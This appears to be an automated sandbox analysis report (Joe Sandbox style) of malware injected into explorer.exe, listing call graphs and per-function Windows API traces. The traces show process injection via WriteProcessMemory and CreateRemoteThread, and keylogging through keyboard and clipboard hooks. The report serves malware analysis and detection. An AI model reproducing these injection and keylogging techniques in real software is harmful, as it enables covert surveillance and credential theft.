calls 932 2ef19d6 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 931->932 933 2ef1af4 CreateRemoteThread 932->933 936 2ef1a2b 932->936 935 2ef1b0b CloseHandle 933->935 934 2ef1a31 CreateMutexA GetLastError 934->936 937 2ef1a4d CloseHandle Sleep 934->937 938 2ef1b0d CloseHandle CloseHandle 935->938 936->934 939 2ef1a61 GetModuleHandleA GetProcAddress ReadProcessMemory 936->939 937->934 938->926 940 2ef1aed 939->940 941 2ef1a92 WriteProcessMemory 939->941 940->935 940->938 941->940 942 2ef1abc CreateRemoteThread CloseHandle Sleep WriteProcessMemory 941->942 942->940 944 2ef2724 VirtualQuery 943->944 945 2ef29f3 944->945 946 2ef2a07 945->946 947 2ef29f7 GetProcessHeap HeapFree 945->947 946->849 947->946 948->832 949->890 950->902 952 2ef130c RtlZeroMemory 951->952 952->896 952->897 954 2ef2577 lstrlen RtlMoveMemory 953->954 955 2ef25a1 953->955 954->955 955->902 957->901 959 2ef1b3a 958->959 963 2ef195a 958->963 960 2ef1b4a NtCreateSection 959->960 961 2ef1b69 959->961 960->961 962 2ef1b7e NtMapViewOfSection 961->962 961->963 962->963 963->924 965 2ef1bd4 964->965 972 2ef1c06 964->972 966 2ef1bd6 RtlMoveMemory 965->966 966->966 966->972 967 2ef1c69 968 2ef19b6 NtUnmapViewOfSection 967->968 969 2ef1c87 LdrProcessRelocationBlock 967->969 968->931 969->967 969->968 970 2ef1c17 LoadLibraryA 970->968 970->972 971 2ef1c47 GetProcAddress 971->968 971->972 972->967 972->970 972->971 973->855 974->857 976 2ef27bf CryptCreateHash lstrlen CryptHashData CryptGetHashParam 975->976 977 2ef1445 CreateMutexA GetLastError 975->977 978 2ef2805 wsprintfA 976->978 977->860 977->861 978->978 979 2ef2827 CryptDestroyHash CryptReleaseContext 978->979 979->977 980->865 982 2ef2631 981->982 983 2ef2681 CloseHandle 982->983 984 2ef2671 Thread32Next 982->984 985 2ef263d OpenThread 982->985 983->869 984->982 986 2ef2658 SuspendThread 985->986 987 2ef2660 ResumeThread 985->987 988 2ef2666 CloseHandle 986->988 987->988 988->984 990 2ef1f44 989->990 998 2ef1fad 989->998 990->998 1008 2ef1fea VirtualProtect 990->1008 992 2ef1f5b 992->998 1009 2ef29bd VirtualAlloc 992->1009 994 2ef1f67 995 2ef1f71 RtlMoveMemory 994->995 997 2ef1f84 994->997 995->997 1010 2ef1fea VirtualProtect 997->1010 998->870 1000 2ef2724 VirtualQuery 999->1000 1001 2ef1e93 1000->1001 1004 2ef14fa 1001->1004 1011 2ef1ed8 1001->1011 1004->879 1006 2ef1eba 1006->1004 1016 2ef1fea VirtualProtect 1006->1016 1008->992 1009->994 1010->998 1012 2ef1e9e 1011->1012 1013 2ef1eea 1011->1013 1012->1004 1015 2ef1fea VirtualProtect 1012->1015 1013->1012 1014 2ef1f04 lstrcmp 1013->1014 1014->1012 1014->1013 1015->1006 1016->1004

                                                                                                                                        Callgraph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        • Opacity -> Relevance
                                                                                                                                        • Disassembly available
                                                                                                                                        callgraph 0 Function_02EF276D 1 Function_02EF29EB 25 Function_02EF2724 1->25 2 Function_02EF1FEA 3 Function_02EF2569 4 Function_02EF29E7 5 Function_02EF1E66 29 Function_02EF1CBF 5->29 6 Function_02EF9AE0 7 Function_02EF25F1 8 Function_02EF24CC 9 Function_02EF26C9 10 Function_02EF2841 11 Function_02EF255C 12 Function_02EF17DC 43 Function_02EF2A09 12->43 13 Function_02EF275A 14 Function_02EF1ED8 15 Function_02EF29AE 16 Function_02EF12AE 16->1 16->3 16->10 16->11 16->15 31 Function_02EF29BD 16->31 16->43 17 Function_02EF26AE 18 Function_02EF13AE 18->1 18->7 34 Function_02EF1F3A 18->34 18->43 44 Function_02EF1E89 18->44 47 Function_02EF2799 18->47 19 Function_02EF182D 19->1 19->15 26 Function_02EF25A4 19->26 41 Function_02EF200D 19->41 19->43 20 Function_02EF162B 35 Function_02EF16B9 20->35 21 Function_02EF3627 22 Function_02EF1B26 23 Function_02EF1E26 23->29 24 Function_02EF10A5 24->0 24->1 24->9 24->10 24->13 24->16 24->17 24->25 28 Function_02EF18BF 24->28 38 Function_02EF268F 24->38 40 Function_02EF288D 24->40 24->43 26->43 27 Function_02EF20A1 27->1 27->8 27->31 33 Function_02EF243D 27->33 39 Function_02EF240F 27->39 27->40 42 Function_02EF298A 27->42 27->43 28->22 28->25 32 Function_02EF1BBD 28->32 30 Function_02EF293E 30->1 30->43 33->42 33->43 34->2 34->5 34->31 36 Function_02EF1FB4 34->36 35->1 35->12 36->23 37 Function_02EF1533 39->10 41->1 41->27 41->43 44->2 44->14 44->25 45 Function_02EF1581 45->1 45->25 45->30 45->35 45->43 46 Function_02EF1000 48 Function_02EF1016 46->48 48->0 48->1 48->9 48->10 48->13 48->16 48->17 48->18 48->24 48->25 48->28 48->38 48->40 48->43

                                                                                                                                        Executed Functions

                                                                                                                                        Function 02EF1016 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 193stringsleepprocessCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02EF2724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,02EF29F3,-00000001,02EF128C), ref: 02EF2731
                                                                                                                                          • Part of subcall function 02EF2A09: GetProcessHeap.KERNEL32(00000008,0000A000,02EF10BF), ref: 02EF2A0C
                                                                                                                                          • Part of subcall function 02EF2A09: RtlAllocateHeap.NTDLL(00000000), ref: 02EF2A13
                                                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 02EF1038
                                                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 02EF106C
                                                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 02EF1075
                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,02EF1010), ref: 02EF107B
                                                                                                                                        • wsprintfA.USER32 ref: 02EF10E7
                                                                                                                                        • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 02EF1155
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02EF1160
                                                                                                                                        • Process32First.KERNEL32(00000000,?), ref: 02EF117F
                                                                                                                                        • CharLowerA.USER32(?), ref: 02EF1199
                                                                                                                                        • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 02EF11B5
                                                                                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02EF1212
                                                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 02EF126C
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02EF127F
                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 02EF129F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
                                                                                                                                        • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                                                                                                        • API String ID: 3206029838-2805246637
                                                                                                                                        • Opcode ID: ba6307cd1353bdc5c008a9e561fc350564db41e93cc103e59104bc3a673c34db
                                                                                                                                        • Instruction ID: 0fd746b216f38d6f93c3cf19739e3b407c0e90447a6e4daf2c9cd93cd9193c26
                                                                                                                                        • Opcode Fuzzy Hash: ba6307cd1353bdc5c008a9e561fc350564db41e93cc103e59104bc3a673c34db
                                                                                                                                        • Instruction Fuzzy Hash: 73511B30AC03449BD7D4EFB1D844A7A779AEBC4744F809929FF098B2C0EB3099458E61
                                                                                                                                        Function 02EF10A5 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 151stringsleepprocessCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02EF2A09: GetProcessHeap.KERNEL32(00000008,0000A000,02EF10BF), ref: 02EF2A0C
                                                                                                                                          • Part of subcall function 02EF2A09: RtlAllocateHeap.NTDLL(00000000), ref: 02EF2A13
                                                                                                                                        • wsprintfA.USER32 ref: 02EF10E7
                                                                                                                                          • Part of subcall function 02EF276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 02EF2777
                                                                                                                                          • Part of subcall function 02EF276D: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,02EF10FE), ref: 02EF2789
                                                                                                                                        • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 02EF1155
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02EF1160
                                                                                                                                        • Process32First.KERNEL32(00000000,?), ref: 02EF117F
                                                                                                                                        • CharLowerA.USER32(?), ref: 02EF1199
                                                                                                                                        • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 02EF11B5
                                                                                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02EF1212
                                                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 02EF126C
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02EF127F
                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 02EF129F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                                                                                                                        • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                                                                                                        • API String ID: 3018447944-2805246637
                                                                                                                                        • Opcode ID: 3224f34c0507d996af11d1546eca5879584bda30ca99cf6eadeda5980be11bf0
                                                                                                                                        • Instruction ID: cf916c4034dd686261309397e6bb2e79ec7d67fd30535c0183824ab17d22b4a5
                                                                                                                                        • Opcode Fuzzy Hash: 3224f34c0507d996af11d1546eca5879584bda30ca99cf6eadeda5980be11bf0
                                                                                                                                        • Instruction Fuzzy Hash: 6F410E306C43449BD7D4EFB1884497E779AEBC4754F409928FF4A8B1C0EB30D9459E61
                                                                                                                                        Function 02EF9AE0 Relevance: 6.2, APIs: 4, Instructions: 194COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 122 2ef9ae0-2ef9ae5 123 2ef9cad 122->123 124 2ef9aeb-2ef9af8 122->124 123->123 125 2ef9b0a-2ef9b0f 124->125 126 2ef9b11 125->126 127 2ef9b13 126->127 128 2ef9b00-2ef9b05 126->128 130 2ef9b18-2ef9b1a 127->130 129 2ef9b06-2ef9b08 128->129 129->125 129->126 131 2ef9b1c-2ef9b21 130->131 132 2ef9b23-2ef9b27 130->132 131->132 132->130 133 2ef9b29 132->133 134 2ef9b2b-2ef9b32 133->134 135 2ef9b34-2ef9b39 133->135 134->130 134->135 136 2ef9b3b-2ef9b44 135->136 137 2ef9b48-2ef9b4a 135->137 138 2ef9bba-2ef9bbd 136->138 139 2ef9b46 136->139 140 2ef9b4c-2ef9b51 137->140 141 2ef9b53-2ef9b57 137->141 142 2ef9bc2-2ef9bc5 138->142 139->137 140->141 143 2ef9b59-2ef9b5e 141->143 144 2ef9b60-2ef9b62 141->144 145 2ef9bc7-2ef9bc9 142->145 143->144 146 2ef9b84-2ef9b93 144->146 147 2ef9b64 144->147 145->142 150 2ef9bcb-2ef9bce 145->150 148 2ef9b95-2ef9b9c 146->148 149 2ef9ba4-2ef9bb1 146->149 151 2ef9b65-2ef9b67 147->151 148->148 152 2ef9b9e 148->152 149->149 153 2ef9bb3-2ef9bb5 149->153 150->142 154 2ef9bd0-2ef9bec 150->154 155 2ef9b69-2ef9b6e 151->155 156 2ef9b70-2ef9b74 151->156 152->129 153->129 154->145 157 2ef9bee 154->157 155->156 156->151 158 2ef9b76 156->158 159 2ef9bf4-2ef9bf8 157->159 160 2ef9b78-2ef9b7f 158->160 161 2ef9b81 158->161 162 2ef9c3f-2ef9c42 159->162 163 2ef9bfa-2ef9c10 LoadLibraryA 159->163 160->151 160->161 161->146 164 2ef9c45-2ef9c4c 162->164 165 2ef9c11-2ef9c16 163->165 166 2ef9c4e-2ef9c50 164->166 167 2ef9c70-2ef9ca0 VirtualProtect * 2 164->167 165->159 168 2ef9c18-2ef9c1a 165->168 171 2ef9c63-2ef9c6e 166->171 172 2ef9c52-2ef9c61 166->172 173 2ef9ca4-2ef9ca8 167->173 169 2ef9c1c-2ef9c22 168->169 170 2ef9c23-2ef9c30 GetProcAddress 168->170 169->170 174 2ef9c39-2ef9c3c 170->174 175 2ef9c32-2ef9c37 170->175 171->172 172->164 173->173 176 2ef9caa 173->176 175->165 176->123
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF8000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF8000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef8000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 58aa2ae726f6cb9fae6899fc115e329ef707962e204ca4a1ecf8058cfa77fb81
                                                                                                                                        • Instruction ID: 9cc52786d43e4efdf0ae4d7bee95b1929ffff955b21f51bc8c94145e61d693d1
                                                                                                                                        • Opcode Fuzzy Hash: 58aa2ae726f6cb9fae6899fc115e329ef707962e204ca4a1ecf8058cfa77fb81
                                                                                                                                        • Instruction Fuzzy Hash: 845149B1A846528BD7608E78CCE07F0B794EB81228B189779C6E6CB3C7E7945806C764
                                                                                                                                        Function 02EF276D Relevance: 3.0, APIs: 2, Instructions: 23fileCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 177 2ef276d-2ef277f OpenFileMappingA 178 2ef2794-2ef2798 177->178 179 2ef2781-2ef2791 MapViewOfFile 177->179 179->178
                                                                                                                                        APIs
                                                                                                                                        • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 02EF2777
                                                                                                                                        • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,02EF10FE), ref: 02EF2789
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$MappingOpenView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3439327939-0
                                                                                                                                        • Opcode ID: 6362d92363eb1a87dbcf5a7b55e0d0515b7105649de0adad1d65075f1a263c3e
                                                                                                                                        • Instruction ID: 5d49b6ed8d2bd92ed1a681db32ff05d5976d620696fc15cdc57972977815c3a6
                                                                                                                                        • Opcode Fuzzy Hash: 6362d92363eb1a87dbcf5a7b55e0d0515b7105649de0adad1d65075f1a263c3e
                                                                                                                                        • Instruction Fuzzy Hash: FFD01231B812317BD3745A776C0CF837E9DDFC5AE1B014025B60DD2140E6508810C2F0
                                                                                                                                        Function 02EF275A Relevance: 3.0, APIs: 2, Instructions: 8fileCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 180 2ef275a-2ef276c UnmapViewOfFile CloseHandle
                                                                                                                                        APIs
                                                                                                                                        • UnmapViewOfFile.KERNEL32(00000000,?,02EF129A,00000001), ref: 02EF275E
                                                                                                                                        • CloseHandle.KERNELBASE(?,?,02EF129A,00000001), ref: 02EF2765
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseFileHandleUnmapView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2381555830-0
                                                                                                                                        • Opcode ID: 9ac1cd08dec6568aeb58976598fe59a461252a58390c6cec6dc26baa6d2ff410
                                                                                                                                        • Instruction ID: c2a16f7d9f9190215072f252f6dd589b9523b267bc7790b20f34831aa857c7ca
                                                                                                                                        • Opcode Fuzzy Hash: 9ac1cd08dec6568aeb58976598fe59a461252a58390c6cec6dc26baa6d2ff410
                                                                                                                                        • Instruction Fuzzy Hash: C7B01236CC607097C3942736780C8DB3F18EFC922134509C6F30D8150057240891C6EC
                                                                                                                                        Function 02EF2A09 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 181 2ef2a09-2ef2a19 GetProcessHeap RtlAllocateHeap
                                                                                                                                        APIs
                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000A000,02EF10BF), ref: 02EF2A0C
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 02EF2A13
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1357844191-0
                                                                                                                                        • Opcode ID: 1f8f8c705b4447f65206f4ae68c31eab1900a25461ae81106b640ad5bd64c736
                                                                                                                                        • Instruction ID: 069e3b29b02bea07f5c832dfbc12eaf15eeb3164076a5c80bebc02f4a6e7df03
                                                                                                                                        • Opcode Fuzzy Hash: 1f8f8c705b4447f65206f4ae68c31eab1900a25461ae81106b640ad5bd64c736
                                                                                                                                        • Instruction Fuzzy Hash: C9A002B1ED01406BDD845BA5990DF157758A7C4702F4049C67346C5440DD7554D48721

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 02EF18BF Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 208injectionnativesleepCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02EF2724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,02EF29F3,-00000001,02EF128C), ref: 02EF2731
                                                                                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 02EF18F4
                                                                                                                                        • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 02EF192F
                                                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 02EF19BF
                                                                                                                                        • RtlMoveMemory.NTDLL(00000000,02EF3638,00000016), ref: 02EF19E6
                                                                                                                                        • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 02EF1A0E
                                                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 02EF1A1E
                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02EF1A38
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 02EF1A40
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02EF1A4E
                                                                                                                                        • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02EF1A55
                                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 02EF1A6B
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02EF1A72
                                                                                                                                        • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02EF1A88
                                                                                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02EF1AB2
                                                                                                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02EF1AC5
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02EF1ACC
                                                                                                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02EF1AD3
                                                                                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02EF1AE7
                                                                                                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02EF1AFE
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02EF1B0B
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02EF1B11
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02EF1B17
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 02EF1B1A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                                                                        • String ID: atan$ntdll$opera_shared_counter
                                                                                                                                        • API String ID: 1066286714-2737717697
                                                                                                                                        • Opcode ID: 5c71a3d7d071e7e92991fb19d2f3deff48f3a0e388e80bdf724d01ab51bcc794
                                                                                                                                        • Instruction ID: 23ed4b0b279add955bed6d08e1dfa18347182cbfaf1651c985fafa5d702a5cdf
                                                                                                                                        • Opcode Fuzzy Hash: 5c71a3d7d071e7e92991fb19d2f3deff48f3a0e388e80bdf724d01ab51bcc794
                                                                                                                                        • Instruction Fuzzy Hash: 6061AE31A84349EFD790DF258C84E6BBBEDEB88758F404959FA49D7280D770D8448B62
                                                                                                                                        Function 02EF2799 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68encryptionstringCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 02EF27B5
                                                                                                                                        • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 02EF27CD
                                                                                                                                        • lstrlen.KERNEL32(?,00000000), ref: 02EF27D5
                                                                                                                                        • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 02EF27E0
                                                                                                                                        • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 02EF27FA
                                                                                                                                        • wsprintfA.USER32 ref: 02EF2811
                                                                                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 02EF282A
                                                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 02EF2834
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                                                                        • String ID: %02X
                                                                                                                                        • API String ID: 3341110664-436463671
                                                                                                                                        • Opcode ID: 2c7f4d655d324b0bcc5cc6b39c37e2999912e61f84d25e79665c4ad5ad0b91de
                                                                                                                                        • Instruction ID: 4332d21890182f56721838b11f95d6f57e1366346d40b7f92bef5298626373cf
                                                                                                                                        • Opcode Fuzzy Hash: 2c7f4d655d324b0bcc5cc6b39c37e2999912e61f84d25e79665c4ad5ad0b91de
                                                                                                                                        • Instruction Fuzzy Hash: 391182B1D80148BFEB519B96DC48EEEBF7DEB88305F5044A6FB05E2100D7314E519B60
                                                                                                                                        Function 02EF162B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetKeyboardState.USER32(?), ref: 02EF1652
                                                                                                                                        • ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 02EF167A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: KeyboardStateUnicode
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3453085656-3916222277
                                                                                                                                        • Opcode ID: d75f62a43f54eff80c96e27d27d7d7afa9f19469c41357645b9b25ab415f3e0c
                                                                                                                                        • Instruction ID: 52f94302c1e17278f116af3542af777ddc3bf4526a06f066c99f3bff41cc9b3d
                                                                                                                                        • Opcode Fuzzy Hash: d75f62a43f54eff80c96e27d27d7d7afa9f19469c41357645b9b25ab415f3e0c
                                                                                                                                        • Instruction Fuzzy Hash: 8401D632D8020DDBDB70CA11D944BFB73BCAF45708F4A942AEB09EA040D730D5818AA1
                                                                                                                                        Function 02EF13AE Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 144libraryloaderthreadCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • RtlZeroMemory.NTDLL(02EF5013,0000001C), ref: 02EF13C8
                                                                                                                                        • VirtualQuery.KERNEL32(02EF13AE,?,0000001C), ref: 02EF13DA
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02EF140B
                                                                                                                                        • GetCurrentProcessId.KERNEL32(00000004), ref: 02EF141C
                                                                                                                                        • wsprintfA.USER32 ref: 02EF1433
                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02EF1448
                                                                                                                                        • GetLastError.KERNEL32 ref: 02EF144E
                                                                                                                                        • RtlInitializeCriticalSection.NTDLL(02EF582C), ref: 02EF1465
                                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 02EF1489
                                                                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 02EF14A6
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02EF14AF
                                                                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 02EF14D0
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02EF14D3
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02EF14F1
                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 02EF150D
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02EF1514
                                                                                                                                        • RtlExitUserThread.NTDLL(00000000), ref: 02EF152A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000013.00000002.4123291639.0000000002EF1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_19_2_2ef1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
                                                                                                                                        • String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
                                                                                                                                        • API String ID: 3628807430-1779906909
                                                                                                                                        • Opcode ID: 2f837a755a895473434a32e050b7527463e0e4cca2bc6569747b503d29e98a0a
                                                                                                                                        • Instruction ID: e036639069bdfade118dbe9b40a3c30a3ec241548d7fd640b4c3a6a5c362b85e
